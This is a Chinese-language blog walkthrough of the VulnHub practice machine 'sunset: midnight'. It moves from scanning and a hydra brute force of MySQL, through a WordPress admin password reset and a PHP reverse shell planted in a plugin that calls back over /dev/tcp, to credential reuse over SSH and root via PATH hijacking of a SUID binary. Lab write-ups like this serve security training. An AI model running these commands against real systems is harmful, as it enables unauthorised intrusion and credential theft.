• 2021年5月8日 上午5:28

超的快乐一天

做个人

sunset: midnight(vulnhub)

唯一一线

唯一一线

8月 22, 2020

靶机来源于vulnhub:https://www.vulnhub.com/entry/sunset-midnight,517/

网络环境

(kali linux)攻击机ip:192.168.56.103

受害机ip:192.168.56.103 域名:sunset-midnight

发现IP

nmap -sP 192.168.56.0/24

发现ip 192.168.56.118

继续扫描获取信息

nmap -sV 192.168.56.118

发现开放端口 22 , 80 , 3306

访问http页面

通过IP访问地址跳转向了 http://sunset-midnight

那么通过修改hosts文件重新访问

vi /etc/hosts

写入:

192.168.56.118      sunset-midnight

再次访问

可以初步判断该网站的框架为wordpress

mysql发现入口

3306端口开放那么很值得去爆破一下看看是否是简单密码

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.56.118

这两分钟的花费是值得的,爆破出了简单密码

密码为:robert

我们拿到数据库的root权限去登录

成功root登入数据库

查看wordpress的库

show databases;
从名字看 wordpress_db 应该是wordpress的库
use wordpress_db;
show tables;

看wp_users表里wordpress的用户

select * from wp_users;

网站有一个管理员用户名为admin , 但是密码被加密了,没有明文密码

但是,我们是root,我们可以把密码改了

 update wp_users set user_pass=md5('123456') where user_login='admin';

那么admin的密码就改为了123456

现在我们去登录admin

wordpress的登陆界面为wp-amin

http://sunset-night/wp-admin

成功登录wordpress后台管理

通过管理后台修改插件php代码注入恶意代码

点击Plugins里的Plugins editor来编辑插件Hello Dolly的源代码

在句头写入:

system("/bin/bash -c 'bash -i &> /dev/tcp/192.168.56.103/7777 0>&1'");

执行此代码将会把bash反弹到kali上 7777端口上

在Pulgins里找到Hello Dolly 点击active就可以执行这个php

我们先用kali监听7777端口

nc -lvp 7777

再去点击active

那么我们成功拿到了一个bash

在网站目录下寻找信息

一般wordpress的配置文件里都写着重要信息

cat /var/www/html/wordpress/wp-config.php

发现一个jose的数据库用户和明文密码

我们已经有了root的数据库权限,其他用户的权限对我们虽然没什么用,但是有可能数据库密码有可能和用户密码相同,且passwd文件中确实存在名为jose的普通用户,所以值得去尝试

ssh jose@192.168.56.118
尝试是值得的 我们成功登陆jose用户

提权

查看SUID权限

find / -perm -u=s -type f 2>/dev/null
这些文件中status比较特殊不妨执行以下看看

service: not found

这让我想起service命令

那么我们给他一个service文件它很有可能去执行service

echo '/bin/bash' > /tmp/service

然后给service文件执行权限

chmod u+x /tmp/service

再在环境变量中添加/tmp/目录

export PATH=/tmp:$PATH

再次执行/bin/status

BINGO! 我们获得了root权限

cat /root/root.txt
唯一一线
Latest posts by 唯一一线 (see all)
唯一一线

唯一一线

相情不如偶遇

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注


CAPTCHA Image
Reload Image